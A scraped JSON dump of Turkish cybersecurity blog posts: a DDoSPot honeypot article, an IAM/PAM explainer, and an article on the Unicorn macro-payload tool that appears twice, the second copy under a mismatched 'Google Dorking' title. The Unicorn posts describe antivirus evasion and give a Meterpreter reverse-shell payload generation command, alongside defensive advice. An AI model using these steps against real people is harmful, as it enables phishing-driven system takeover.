ddospot.py<\/p>\n<p>&nbsp;Belirli portlarda &ccedil;al\u0131\u015ft\u0131rma<br>python ddospot.py --ports 80,443,53<\/p>\n<p><br>&nbsp;Yap\u0131land\u0131rma &Ouml;rne\u011fi<\/p>\n<p>python<br>&nbsp;config.py &ouml;rne\u011fi<br>HONEYPOT_PORTS = {<br>&nbsp; &nbsp; 80: 'http',<br>&nbsp; &nbsp; 53: 'dns',<br>&nbsp; &nbsp; 123: 'ntp',<br>&nbsp; &nbsp; 1900: 'ssdp'<br>}<\/p>\n<p>LOG_LEVEL = 'INFO'<br>LOG_FILE = '\/var\/log\/ddospot.log'<\/p>\n<p><br>&nbsp;&Ccedil;\u0131kt\u0131 &Ouml;rnekleri<\/p>\n<p>&nbsp;Log Format\u0131:<br>json<br>{<br>&nbsp; \"timestamp\": \"2024-01-15 10:30:00\",<br>&nbsp; \"source_ip\": \"192.168.1.100\",<br>&nbsp; \"protocol\": \"HTTP\",<br>&nbsp; \"attack_type\": \"HTTP Flood\",<br>&nbsp; \"packet_count\": 1500,<br>&nbsp; \"duration\": \"00:02:30\"<br>}<\/p>\n<p><br>&Ccedil;al\u0131\u015fma Mant\u0131\u011f\u0131<\/p>\n<p>1. Dinleme: Belirlenen portlarda trafi\u011fi dinler<br>2. Analiz: Gelen paketleri analiz eder<br>3. S\u0131n\u0131fland\u0131rma: Sald\u0131r\u0131 t&uuml;r&uuml;n&uuml; belirler<br>4. Loglama: Detaylar\u0131 kaydeder<br>5. Raporlama: \u0130statistikleri sunar<\/p>\n<p>Kullan\u0131m Senaryolar\u0131<\/p>\n<p>&nbsp;A. G&uuml;venlik Testi<\/p>\n<p>&nbsp;Test ortam\u0131nda DDoS savunmalar\u0131n\u0131 test etmek i&ccedil;in<br>python ddospot.py --test-mode<\/p>\n<p><br>&nbsp;B. Ger&ccedil;ek Zamanl\u0131 \u0130zleme<\/p>\n<p>&nbsp;Web aray&uuml;z&uuml; ile izleme<br>python ddospot.py --web-interface --port 8080<\/p>\n<p><br>&nbsp;C. E\u011fitim ve Ara\u015ft\u0131rma<br>- DDoS sald\u0131r\u0131 metodolojilerini &ouml;\u011frenmek<br>- A\u011f g&uuml;venli\u011fi e\u011fitimi i&ccedil;in<\/p>\n<p>&Ouml;nemli Uyar\u0131lar<\/p>\n<p>&nbsp;Yasal Uyar\u0131:<br>- Sadece kendi a\u011f\u0131n\u0131zda kullan\u0131n!<br>- \u0130zinsiz a\u011flarda kullan\u0131m yasa d\u0131\u015f\u0131d\u0131r<br>- Sadece e\u011fitim ve g&uuml;venlik testleri i&ccedil;in<\/p>\n<p>&nbsp;G&uuml;venlik &Ouml;nlemleri:<\/p>\n<p>&nbsp;\u0130zole ortamda kullan\u0131n<br>- Sanal makine<br>- Test a\u011f\u0131<br>- \u0130zole laboratuvar<\/p>\n<p><br>Faydalar\u0131<\/p>\n<p>1. Erken Uyar\u0131 Sistemi: DDoS sald\u0131r\u0131lar\u0131n\u0131 erken tespit<br>2. Sald\u0131r\u0131 Analizi: Sald\u0131r\u0131 metodolojilerini anlama<br>3. G&uuml;venlik Fark\u0131ndal\u0131\u011f\u0131: Ekipmanlar\u0131 test etme<br>4. Log ve Kan\u0131t: Hukuki s&uuml;re&ccedil;ler i&ccedil;in kan\u0131t toplama<\/p>\n<p><br>DDoSPot bize \u015funu hat\u0131rlat\u0131yor: \"G&uuml;&ccedil;, beraberinde sorumluluk getirir.\" Siber g&uuml;venlik ara&ccedil;lar\u0131, t\u0131pk\u0131 bir cerrah\u0131n bist&uuml;risi gibidir - do\u011fru elde hayat kurtar\u0131r, yanl\u0131\u015f elde ise zarar verir.<\/p>\n<p>Unutmay\u0131n: Ger&ccedil;ek g&uuml;venlik uzmanlar\u0131, sistemleri g&uuml;&ccedil;lendirmek i&ccedil;in &ccedil;al\u0131\u015f\u0131r, zay\u0131flatmak i&ccedil;in de\u011fil.<\/p>\n<p>---<\/p>\n<p>Bu yaz\u0131 sadece bilgilendirme ama&ccedil;l\u0131d\u0131r. Siber g&uuml;venlik ara&ccedil;lar\u0131n\u0131 kullanmadan &ouml;nce yerel yasalar\u0131n\u0131z\u0131 kontrol edin ve daima etik kurallara uyun.<\/p>\n<p>https:\/\/github.com\/aelth\/ddospot<\/p>","excerpt":"\u0130nternetin bu kadar hayat\u0131m\u0131z\u0131n merkezinde oldu\u011fu bir d\u00f6nemde, siber g\u00fcvenlik art\u0131k hepimizin ortak sorumlulu\u011fu. DDoS (Distributed Denial of Service) sald\u0131r\u0131lar\u0131, dijital d\u00fcnyan\u0131n en yayg\u0131n ve y\u0131k\u0131c\u0131 tehditlerinden biri olarak kar\u015f\u0131m\u0131za \u00e7\u0131k\u0131yor. ","created_at":"2025-11-25 09:10:31","updated_at":"2026-09-08 00:23:23","category_id":7,"view_count":599,"reading_time":6,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-11-25 06:10:00","featured_image":"18383920cda6385102895fa27b3d45c1.jpg","slug":"ddospot-ddos-saldirilarini-anlamanin-etik-yolu","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":321,"title":" IAM m\u0131 PAM m\u0131? \u0130\u015fte Sistem G\u00fcvenli\u011finizin Anahtar\u0131! ","content":"<p class=\"ds-markdown-paragraph\">Kurumsal dijital g&uuml;venlikte en &ccedil;ok merak edilen sorulardan biri: \"Kritik sistemlerimizin g&uuml;venli\u011fi i&ccedil;in hangi eri\u015fim modeli daha etkili?\" Gelin, bu iki &ouml;nemli kavram\u0131 herkesin anlayabilece\u011fi bir dille ke\u015ffedelim.<\/p>\r\n<p class=\"ds-markdown-paragraph\"><iframe src=\"https:\/\/www.youtube.com\/embed\/f9Vkh1L1XPE\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\r\n<h2 class=\"ds-markdown-paragraph\">IAM (Kimlik ve Eri\u015fim Y&ouml;netimi) - Demokratik Eri\u015fim<\/h2>\r\n<p>IAM, kurumunuzdaki t&uuml;m kullan\u0131c\u0131lar\u0131n (&ccedil;al\u0131\u015fanlar, m&uuml;\u015fteriler, i\u015f ortaklar\u0131) sistem ve uygulamalara g&uuml;venli bir \u015fekilde eri\u015fimini sa\u011flayan kapsay\u0131c\u0131 bir yakla\u015f\u0131md\u0131r.<\/p>\r\n<p class=\"ds-markdown-paragraph\">Temel \u0130\u015flevi: \"Kim, hangi kayna\u011fa eri\u015febilir?\" sorusuna yan\u0131t verir<br>\ud83d\udce7 E-posta sistemleri ve i\u015f uygulamalar\u0131 gibi g&uuml;nl&uuml;k kullan\u0131lan platformlara eri\u015fim<br>\ud83d\udd11 SSO (Tek Oturum A&ccedil;ma), MFA (&Ccedil;ok Fakt&ouml;rl&uuml; Kimlik Do\u011frulama) gibi g&uuml;venlik teknolojileri<br>\ud83d\udc68&zwj;\ud83d\udcbc RBAC (Rol Tabanl\u0131 Eri\u015fim Kontrol&uuml;) ile yetki y&ouml;netimi<br>\ud83d\udee0\ufe0f Okta, Azure AD gibi merkezi y&ouml;netim ara&ccedil;lar\u0131<\/p>\r\n<h2 class=\"ds-markdown-paragraph\">\ud83d\udee1\ufe0f PAM (Ayr\u0131cal\u0131kl\u0131 Eri\u015fim Y&ouml;netimi) - &Ouml;zel G&uuml;venlik B&ouml;lgesi<\/h2>\r\n<p class=\"ds-markdown-paragraph\"><br>PAM, y&ouml;netici hesaplar\u0131, root kullan\u0131c\u0131lar ve sistem uzmanlar\u0131 gibi y&uuml;ksek ayr\u0131cal\u0131kl\u0131 hesaplar\u0131n korunmas\u0131na odaklan\u0131r.<\/p>\r\n<p class=\"ds-markdown-paragraph\">Kritik G&ouml;revi: \"Kim, hassas sistemlere ne zaman ve nas\u0131l eri\u015febilir?\" sorusunu y&ouml;netmek<br>\ud83d\udd12 Sunucular, veritabanlar\u0131, a\u011f cihazlar\u0131 gibi kritik altyap\u0131lara eri\u015fim<br>\u23f1\ufe0f Zaman tabanl\u0131 ve izin kontroll&uuml; eri\u015fim y&ouml;netimi<br>\ud83d\udcca T&uuml;m i\u015flemlerin kay\u0131t alt\u0131na al\u0131nmas\u0131 ve denetlenebilirli\u011fi<br>\ud83d\udcbc CyberArk, BeyondTrust, HashiCorp gibi uzman &ccedil;&ouml;z&uuml;mler<\/p>\r\n<h2 class=\"ds-markdown-paragraph\">\ud83e\udd14 Hangisini Se&ccedil;melisiniz?<\/h2>\r\n<p><br>Temel fark: IAM t&uuml;m kullan\u0131c\u0131lar i&ccedil;in genel eri\u015fim sa\u011flarken, PAM yaln\u0131zca y&uuml;ksek riskli hesaplar\u0131 koruma alt\u0131na al\u0131r.<\/p>\r\n<h2 class=\"ds-markdown-paragraph\">\ud83c\udfaf Do\u011fru &Ccedil;&ouml;z&uuml;m Nas\u0131l Belirlenir?<\/h2>\r\n<p class=\"ds-markdown-paragraph\"><br>&bull; E-posta, ofis uygulamalar\u0131 veya bulut servislerine eri\u015fim i&ccedil;in: IAM<br>&bull; Sunucu y&ouml;netimi, veritaban\u0131 administrasyonu veya a\u011f cihaz\u0131 konfig&uuml;rasyonu i&ccedil;in: PAM<\/p>\r\n<p class=\"ds-markdown-paragraph\">Unutmay\u0131n: G&uuml;&ccedil;l&uuml; bir siber g&uuml;venlik stratejisi, hem IAM hem de PAM'\u0131n uyum i&ccedil;inde &ccedil;al\u0131\u015fmas\u0131yla m&uuml;mk&uuml;nd&uuml;r. Hangisine ihtiyac\u0131n\u0131z oldu\u011fu, korumak istedi\u011finiz dijital varl\u0131klar\u0131n\u0131z\u0131n kritiklik seviyesine ba\u011fl\u0131d\u0131r.<\/p>\r\n<p class=\"ds-markdown-paragraph\">#SiberG&uuml;venlik #IAM #PAM #DijitalD&ouml;n&uuml;\u015f&uuml;m #KurumsalG&uuml;venlik<\/p>","excerpt":"G\u00fc\u00e7l\u00fc bir siber g\u00fcvenlik stratejisi, hem IAM hem de PAM'\u0131n uyum i\u00e7inde \u00e7al\u0131\u015fmas\u0131yla m\u00fcmk\u00fcnd\u00fcr. Hangisine ihtiyac\u0131n\u0131z oldu\u011fu, korumak istedi\u011finiz dijital varl\u0131klar\u0131n\u0131z\u0131n kritiklik seviyesine ba\u011fl\u0131d\u0131r.","created_at":"2025-10-17 11:32:57","updated_at":"2026-09-07 22:30:40","category_id":7,"view_count":625,"reading_time":2,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-10-17 11:32:00","featured_image":"e91b71137c905c6e903ad2151fbfbde1.jpg","slug":"iam-mi-pam-mi-iste-sistem-guvenliginizin-anahtari","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":319,"title":"Unicorn: Sosyal M\u00fchendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?","content":"<h2>Giri\u015f<\/h2>\r\n<p>Unicorn: Sosyal M&uuml;hendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?<\/p>\r\n<p>Siber g&uuml;venlik d&uuml;nyas\u0131nda, en g&uuml;&ccedil;l&uuml; g&uuml;venlik duvarlar\u0131n\u0131 ve yaz\u0131l\u0131mlar\u0131 atlatman\u0131n en etkili yollar\u0131ndan biri, insan fakt&ouml;r&uuml;n&uuml; hedef alan sosyal m&uuml;hendislik sald\u0131r\u0131lar\u0131d\u0131r. \u0130\u015fte tam bu noktada, TrustedSec taraf\u0131ndan geli\u015ftirilen Unicorn Framework, adeta bir \"sihirbaz\" gibi, s\u0131radan g&ouml;r&uuml;nen bir epostay\u0131 veya dosyay\u0131 g&uuml;&ccedil;l&uuml; bir sald\u0131r\u0131 arac\u0131na d&ouml;n&uuml;\u015ft&uuml;r&uuml;yor.<\/p>\r\n<p>Peki nedir bu Unicorn, nas\u0131l &ccedil;al\u0131\u015f\u0131r ve en &ouml;nemlisi, onun gibi ara&ccedil;lara kar\u015f\u0131 nas\u0131l korunabiliriz? Gelin birlikte inceleyelim.<\/p>\r\n<h2>Unicorn Nedir?<\/h2>\r\n<p>Unicorn, kullan\u0131m\u0131 son derece basit bir komut sat\u0131r\u0131 arac\u0131d\u0131r. Temel amac\u0131, bir PowerShell beti\u011fini (script) zarars\u0131z g&ouml;r&uuml;nen bir Microsoft Office makrosuna (VBA) d&ouml;n&uuml;\u015ft&uuml;rmektir. Neden mi?<\/p>\r\n<p>&Ccedil;&uuml;nk&uuml; PowerShell, Windows sistemlerdeki \"\u0130svi&ccedil;re &Ccedil;ak\u0131s\u0131\"d\u0131r. A\u011f ke\u015ffi, veri s\u0131zd\u0131rma, dosya indirme ve daha bir&ccedil;ok g&uuml;&ccedil;l&uuml; i\u015flemi ger&ccedil;ekle\u015ftirebilir. Ancak, bir sald\u0131rgan\u0131n hedef sistemde komut sat\u0131r\u0131n\u0131 a&ccedil;\u0131p PowerShell beti\u011fi yazmas\u0131 pek m&uuml;mk&uuml;n de\u011fildir. \u0130\u015fte Unicorn, bu g&uuml;c&uuml;, kullan\u0131c\u0131n\u0131n sadece bir Word veya Excel dosyas\u0131n\u0131 a&ccedil;\u0131p \"Makrolar\u0131 Etkinle\u015ftir\" butonuna t\u0131klamas\u0131yla devreye sokar.<\/p>\r\n<h2>Unicorn Nas\u0131l &Ccedil;al\u0131\u015f\u0131r? (Sihirin Arkas\u0131ndaki Bilim)<\/h2>\r\n<p>S&uuml;re&ccedil; basit ve etkilidir:<\/p>\r\n<p>1. &nbsp;Payload Olu\u015fturma: Sald\u0131rgan, Unicorn'a basit bir komut verir (&ouml;rne\u011fin, hedef sisteme ters kabuk &nbsp;reverse shell &nbsp;ba\u011flant\u0131s\u0131 a&ccedil;mas\u0131n\u0131 s&ouml;yleyen bir komut).<br>2. &nbsp;PowerShell'e D&ouml;n&uuml;\u015f&uuml;m: Unicorn, bu komutu s\u0131k\u0131\u015ft\u0131r\u0131lm\u0131\u015f ve karma\u015f\u0131k bir PowerShell komut dosyas\u0131na d&ouml;n&uuml;\u015ft&uuml;r&uuml;r. Bu kod, antivir&uuml;s yaz\u0131l\u0131mlar\u0131ndan ka&ccedil;\u0131nmak i&ccedil;in &ouml;zel olarak tasarlanm\u0131\u015ft\u0131r.<br>3. &nbsp;VBA Makrosuna Yerle\u015ftirme: Olu\u015fturulan PowerShell kodu, otomatik olarak bir Microsoft Office VBA makrosunun i&ccedil;ine g&ouml;m&uuml;l&uuml;r.<br>4. &nbsp;Hedefe Ula\u015ft\u0131rma: Sald\u0131rgan, bu Office dosyas\u0131n\u0131 (.docm veya .xlsm) bir eposta eki olarak g&ouml;nderir veya indirilmesi i&ccedil;in bir link payla\u015f\u0131r. Eposta genellikle acil, inand\u0131r\u0131c\u0131 ve ki\u015fiye &ouml;zel haz\u0131rlanm\u0131\u015ft\u0131r (oltalaman\u0131n phishing).<br>5. &nbsp;Kurban T\u0131klar: Kurban dosyay\u0131 a&ccedil;ar. Office, g&uuml;venlik nedeniyle makrolar\u0131 varsay\u0131lan olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131r ve bir uyar\u0131 &ccedil;ubu\u011fu g&ouml;sterir. Sald\u0131rgan\u0131n epostas\u0131, kullan\u0131c\u0131y\u0131 \"Belgeyi d&uuml;zg&uuml;n g&ouml;r&uuml;nt&uuml;lemek i&ccedil;in makrolar\u0131 etkinle\u015ftirin\" gibi bir mesajla kand\u0131r\u0131r.<br>6. &nbsp;Sihir Ger&ccedil;ekle\u015fir: Kullan\u0131c\u0131 \"Makrolar\u0131 Etkinle\u015ftir\" butonuna t\u0131klad\u0131\u011f\u0131 anda, g&ouml;m&uuml;l&uuml; VBA kodu &ccedil;al\u0131\u015f\u0131r ve arka planda gizlice PowerShell komut dosyas\u0131n\u0131 y&uuml;r&uuml;t&uuml;r. Art\u0131k sald\u0131rgan, hedef sistemde istedi\u011fi komutu &ccedil;al\u0131\u015ft\u0131rabilir.<\/p>\r\n<h2>Unicorn'u Bu Kadar G&uuml;&ccedil;l&uuml; K\u0131lan Nedir?<\/h2>\r\n<p>&nbsp; &nbsp;Basitlik: Tek bir komutla g&uuml;&ccedil;l&uuml; bir sald\u0131r\u0131 arac\u0131 olu\u015fturulabilir.<br>&nbsp; &nbsp;Antivir&uuml;s Atlatma (Evasion): PowerShell payload'lar\u0131n\u0131 obfuscate (kodu karma\u015f\u0131kla\u015ft\u0131rma) ederek bir&ccedil;ok imza tabanl\u0131 antivir&uuml;s &ccedil;&ouml;z&uuml;m&uuml;n&uuml; atlatabilir.<br>&nbsp; &nbsp;Kullan\u0131c\u0131 Dostu Aray&uuml;z: Unicorn'un unicorn.py beti\u011fi, renkli ve anla\u015f\u0131l\u0131r bir &ccedil;\u0131kt\u0131 sunar, kullan\u0131m\u0131 &ccedil;ok kolayd\u0131r.<br>&nbsp; &nbsp;Esneklik: Metasploit payload'lar\u0131, &ouml;zel PowerShell komutlar\u0131 ve daha fazlas\u0131 i&ccedil;in kullan\u0131labilir.<\/p>\r\n<h2>&Ouml;rnek Bir Kullan\u0131m<\/h2>\r\n<p>Bir sald\u0131rgan\u0131n, hedefe ba\u011flanacak basit bir ters kabuk olu\u015fturmak i&ccedil;in kullanaca\u011f\u0131 komut \u015funa benzer:<\/p>\r\n<p><br><code>python unicorn.py windows\/meterpreter\/reverse_http 192.168.1.100 8080<\/code><\/p>\r\n<p><br>Bu komut &ccedil;al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131nda Unicorn, gerekli PowerShell kodunu ve i&ccedil;ine bu kodu g&ouml;m&uuml;l&uuml; oldu\u011fu payload.txt (VBA kodu) dosyas\u0131n\u0131 olu\u015fturur. Sald\u0131rgan bu VBA kodunu bir Word makrosuna kopyalay\u0131p dosyay\u0131 kaydeder ve hedefe g&ouml;nderir.<\/p>\r\n<h2>&nbsp;Unicorn'a Kar\u015f\u0131 Nas\u0131l Korunuruz?<\/h2>\r\n<p>Unicorn'un g&uuml;c&uuml;, insan hatas\u0131na dayan\u0131r. Bu nedenle korunma y&ouml;ntemleri de teknik ve insan odakl\u0131 &ouml;nlemlerin bir birle\u015fimidir:<\/p>\r\n<p>1. &nbsp;Kullan\u0131c\u0131 E\u011fitimi (En Kritik &Ouml;nlem): &Ccedil;al\u0131\u015fanlar\u0131n\u0131z\u0131 sosyal m&uuml;hendislik ve oltalama sald\u0131r\u0131lar\u0131 konusunda s&uuml;rekli e\u011fitin. Tan\u0131mad\u0131klar\u0131 ki\u015filerden gelen, beklenmedik epostalar\u0131 ve ekleri asla a&ccedil;mamalar\u0131 gerekti\u011fini &ouml;\u011fretin. \"Makrolar\u0131 Etkinle\u015ftir\" uyar\u0131s\u0131n\u0131 g&ouml;rd&uuml;klerinde \u015f&uuml;phelenmeliler!<br>2. &nbsp;Makrolar\u0131 Devre D\u0131\u015f\u0131 B\u0131rak\u0131n: Kurumsal ortamlarda, G&uuml;venlik \u0130lkeleri (Group Policy) arac\u0131l\u0131\u011f\u0131yla t&uuml;m Microsoft Office uygulamalar\u0131nda makrolar\u0131 genel olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131n. E\u011fer mutlaka gerekliyse, yaln\u0131zca imzalanm\u0131\u015f makrolara veya belirli g&uuml;venilen konumlardaki dosyalara izin verin.<br>3. &nbsp;AppLocker veya WDAC Kullan\u0131n: Windows ortamlar\u0131nda AppLocker veya Daha G&uuml;&ccedil;l&uuml; Windows Defender Uygulama Denetimi (WDAC) kullanarak, yaln\u0131zca yetkili yaz\u0131l\u0131mlar\u0131n ve betiklerin &ccedil;al\u0131\u015ft\u0131r\u0131lmas\u0131na izin verin. Bu, izinsiz bir PowerShell beti\u011finin &ccedil;al\u0131\u015fmas\u0131n\u0131 engelleyebilir.<br>4. &nbsp;PowerShell \u0130\u015flemlerini \u0130zleyin: Geli\u015fmi\u015f g&uuml;venlik &ccedil;&ouml;z&uuml;mleri (EDR &nbsp;Endpoint Detection and Response) kullanarak \u015f&uuml;pheli PowerShell komutlar\u0131n\u0131 (&ouml;rne\u011fin s\u0131k\u0131\u015ft\u0131r\u0131lm\u0131\u015f kod &ccedil;al\u0131\u015ft\u0131ran, gizli pencerede a&ccedil;\u0131lan) izleyin ve alarm &uuml;retin.<br>5. &nbsp;G&uuml;ncel Yaz\u0131l\u0131m ve Antivir&uuml;s: \u0130\u015fletim sistemi ve antivir&uuml;s yaz\u0131l\u0131mlar\u0131n\u0131z\u0131 her zaman g&uuml;ncel tutun. Yeni nesil antivir&uuml;s &ccedil;&ouml;z&uuml;mleri, davran\u0131\u015f analizi ile bu t&uuml;r sald\u0131r\u0131lar\u0131 tespit edebilme yetene\u011fine sahiptir.<\/p>\r\n<h2>&nbsp;Sonu&ccedil;<\/h2>\r\n<p>Unicorn, sosyal m&uuml;hendislik sald\u0131r\u0131lar\u0131n\u0131n ne kadar etkili ve tehlikeli olabilece\u011fini g&ouml;steren m&uuml;kemmel bir ara&ccedil;t\u0131r. Sadece birka&ccedil; sat\u0131r kodla, g&uuml;venlik fark\u0131ndal\u0131\u011f\u0131 d&uuml;\u015f&uuml;k bir kullan\u0131c\u0131 &uuml;zerinden t&uuml;m bir sistemi ele ge&ccedil;irmek m&uuml;mk&uuml;nd&uuml;r.<\/p>\r\n<p>Bu nedenle, g&uuml;venlik duvarlar\u0131n\u0131n ve antivir&uuml;s yaz\u0131l\u0131mlar\u0131n\u0131n &ouml;tesine ge&ccedil;ip, insan\u0131 \"en zay\u0131f halka\" olmaktan &ccedil;\u0131karacak s&uuml;rekli e\u011fitim ve fark\u0131ndal\u0131k &ccedil;al\u0131\u015fmalar\u0131, modern siber g&uuml;venli\u011fin olmazsa olmaz\u0131d\u0131r. Unicorn bize \u015funu hat\u0131rlat\u0131r: En g&uuml;&ccedil;l&uuml; \u015fifre, en pahal\u0131 g&uuml;venlik yaz\u0131l\u0131m\u0131 bile, bir kullan\u0131c\u0131n\u0131n yanl\u0131\u015f bir d&uuml;\u011fmeye t\u0131klamas\u0131 kadar savunmas\u0131z olabilir.<\/p>\r\n<p>&nbsp;<\/p>\r\n<p>Not: Bu yaz\u0131, Unicorn Framework'&uuml;n nas\u0131l &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 anlamak ve buna kar\u015f\u0131 nas\u0131l korunulaca\u011f\u0131n\u0131 &ouml;\u011fretmek amac\u0131yla yaz\u0131lm\u0131\u015ft\u0131r. Bu bilgiler yaln\u0131zca e\u011fitim ve savunma ama&ccedil;l\u0131 kullan\u0131lmal\u0131d\u0131r. \u0130zinsiz sistemlere s\u0131zma giri\u015fimleri yasa d\u0131\u015f\u0131d\u0131r ve ciddi yasal yapt\u0131r\u0131mlarla sonu&ccedil;lanabilir.<\/p>","excerpt":"Unicorn: Sosyal M\u00fchendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?","created_at":"2025-10-02 22:15:56","updated_at":"2026-09-08 03:21:19","category_id":7,"view_count":791,"reading_time":6,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-10-02 22:15:56","featured_image":"resimyok.jpg","slug":"unicorn-sosyal-muhendisligin-sihirli-araci-ve-nasil-korunursunuz","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":13,"title":"Google Dorking","content":"<h2>Unicorn: Sosyal M&uuml;hendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?<\/h2>\r\n<p>Siber g&uuml;venlik d&uuml;nyas\u0131nda, en g&uuml;&ccedil;l&uuml; g&uuml;venlik duvarlar\u0131n\u0131 ve yaz\u0131l\u0131mlar\u0131 atlatman\u0131n en etkili yollar\u0131ndan biri, insan fakt&ouml;r&uuml;n&uuml; hedef alan sosyal m&uuml;hendislik sald\u0131r\u0131lar\u0131d\u0131r. \u0130\u015fte tam bu noktada, TrustedSec taraf\u0131ndan geli\u015ftirilen Unicorn Framework, adeta bir \"sihirbaz\" gibi, s\u0131radan g&ouml;r&uuml;nen bir epostay\u0131 veya dosyay\u0131 g&uuml;&ccedil;l&uuml; bir sald\u0131r\u0131 arac\u0131na d&ouml;n&uuml;\u015ft&uuml;r&uuml;yor.<\/p>\r\n<p>Peki nedir bu Unicorn, nas\u0131l &ccedil;al\u0131\u015f\u0131r ve en &ouml;nemlisi, onun gibi ara&ccedil;lara kar\u015f\u0131 nas\u0131l korunabiliriz? Gelin birlikte inceleyelim.<\/p>\r\n<h2>&nbsp;Unicorn Nedir?<\/h2>\r\n<p>Unicorn, kullan\u0131m\u0131 son derece basit bir komut sat\u0131r\u0131 arac\u0131d\u0131r. Temel amac\u0131, bir PowerShell beti\u011fini (script) zarars\u0131z g&ouml;r&uuml;nen bir Microsoft Office makrosuna (VBA) d&ouml;n&uuml;\u015ft&uuml;rmektir. Neden mi?<\/p>\r\n<p>&Ccedil;&uuml;nk&uuml; PowerShell, Windows sistemlerdeki \"\u0130svi&ccedil;re &Ccedil;ak\u0131s\u0131\"d\u0131r. A\u011f ke\u015ffi, veri s\u0131zd\u0131rma, dosya indirme ve daha bir&ccedil;ok g&uuml;&ccedil;l&uuml; i\u015flemi ger&ccedil;ekle\u015ftirebilir. Ancak, bir sald\u0131rgan\u0131n hedef sistemde komut sat\u0131r\u0131n\u0131 a&ccedil;\u0131p PowerShell beti\u011fi yazmas\u0131 pek m&uuml;mk&uuml;n de\u011fildir. \u0130\u015fte Unicorn, bu g&uuml;c&uuml;, kullan\u0131c\u0131n\u0131n sadece bir Word veya Excel dosyas\u0131n\u0131 a&ccedil;\u0131p \"Makrolar\u0131 Etkinle\u015ftir\" butonuna t\u0131klamas\u0131yla devreye sokar.<\/p>\r\n<h2>&nbsp;Unicorn Nas\u0131l &Ccedil;al\u0131\u015f\u0131r? (Sihirin Arkas\u0131ndaki Bilim)<\/h2>\r\n<p>S&uuml;re&ccedil; basit ve etkilidir:<\/p>\r\n<p>1. &nbsp;Payload Olu\u015fturma: Sald\u0131rgan, Unicorn'a basit bir komut verir (&ouml;rne\u011fin, hedef sisteme ters kabuk &nbsp;reverse shell &nbsp;ba\u011flant\u0131s\u0131 a&ccedil;mas\u0131n\u0131 s&ouml;yleyen bir komut).<br>2. &nbsp;PowerShell'e D&ouml;n&uuml;\u015f&uuml;m: Unicorn, bu komutu s\u0131k\u0131\u015ft\u0131r\u0131lm\u0131\u015f ve karma\u015f\u0131k bir PowerShell komut dosyas\u0131na d&ouml;n&uuml;\u015ft&uuml;r&uuml;r. Bu kod, antivir&uuml;s yaz\u0131l\u0131mlar\u0131ndan ka&ccedil;\u0131nmak i&ccedil;in &ouml;zel olarak tasarlanm\u0131\u015ft\u0131r.<br>3. &nbsp;VBA Makrosuna Yerle\u015ftirme: Olu\u015fturulan PowerShell kodu, otomatik olarak bir Microsoft Office VBA makrosunun i&ccedil;ine g&ouml;m&uuml;l&uuml;r.<br>4. &nbsp;Hedefe Ula\u015ft\u0131rma: Sald\u0131rgan, bu Office dosyas\u0131n\u0131 (.docm veya .xlsm) bir eposta eki olarak g&ouml;nderir veya indirilmesi i&ccedil;in bir link payla\u015f\u0131r. Eposta genellikle acil, inand\u0131r\u0131c\u0131 ve ki\u015fiye &ouml;zel haz\u0131rlanm\u0131\u015ft\u0131r (oltalaman\u0131n phishing).<br>5. &nbsp;Kurban T\u0131klar: Kurban dosyay\u0131 a&ccedil;ar. Office, g&uuml;venlik nedeniyle makrolar\u0131 varsay\u0131lan olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131r ve bir uyar\u0131 &ccedil;ubu\u011fu g&ouml;sterir. Sald\u0131rgan\u0131n epostas\u0131, kullan\u0131c\u0131y\u0131 \"Belgeyi d&uuml;zg&uuml;n g&ouml;r&uuml;nt&uuml;lemek i&ccedil;in makrolar\u0131 etkinle\u015ftirin\" gibi bir mesajla kand\u0131r\u0131r.<br>6. &nbsp;Sihir Ger&ccedil;ekle\u015fir: Kullan\u0131c\u0131 \"Makrolar\u0131 Etkinle\u015ftir\" butonuna t\u0131klad\u0131\u011f\u0131 anda, g&ouml;m&uuml;l&uuml; VBA kodu &ccedil;al\u0131\u015f\u0131r ve arka planda gizlice PowerShell komut dosyas\u0131n\u0131 y&uuml;r&uuml;t&uuml;r. Art\u0131k sald\u0131rgan, hedef sistemde istedi\u011fi komutu &ccedil;al\u0131\u015ft\u0131rabilir.<\/p>\r\n<h2>&nbsp;Unicorn'u Bu Kadar G&uuml;&ccedil;l&uuml; K\u0131lan Nedir?<\/h2>\r\n<p>&nbsp; &nbsp;Basitlik: Tek bir komutla g&uuml;&ccedil;l&uuml; bir sald\u0131r\u0131 arac\u0131 olu\u015fturulabilir.<br>&nbsp; &nbsp;Antivir&uuml;s Atlatma (Evasion): PowerShell payload'lar\u0131n\u0131 obfuscate (kodu karma\u015f\u0131kla\u015ft\u0131rma) ederek bir&ccedil;ok imza tabanl\u0131 antivir&uuml;s &ccedil;&ouml;z&uuml;m&uuml;n&uuml; atlatabilir.<br>&nbsp; &nbsp;Kullan\u0131c\u0131 Dostu Aray&uuml;z: Unicorn'un unicorn.py beti\u011fi, renkli ve anla\u015f\u0131l\u0131r bir &ccedil;\u0131kt\u0131 sunar, kullan\u0131m\u0131 &ccedil;ok kolayd\u0131r.<br>&nbsp; &nbsp;Esneklik: Metasploit payload'lar\u0131, &ouml;zel PowerShell komutlar\u0131 ve daha fazlas\u0131 i&ccedil;in kullan\u0131labilir.<\/p>\r\n<h2>&nbsp;&Ouml;rnek Bir Kullan\u0131m<\/h2>\r\n<p>Bir sald\u0131rgan\u0131n, hedefe ba\u011flanacak basit bir ters kabuk olu\u015fturmak i&ccedil;in kullanaca\u011f\u0131 komut \u015funa benzer:<\/p>\r\n<p>bash<br>python unicorn.py windows\/meterpreter\/reverse_http 192.168.1.100 8080<\/p>\r\n<p><br>Bu komut 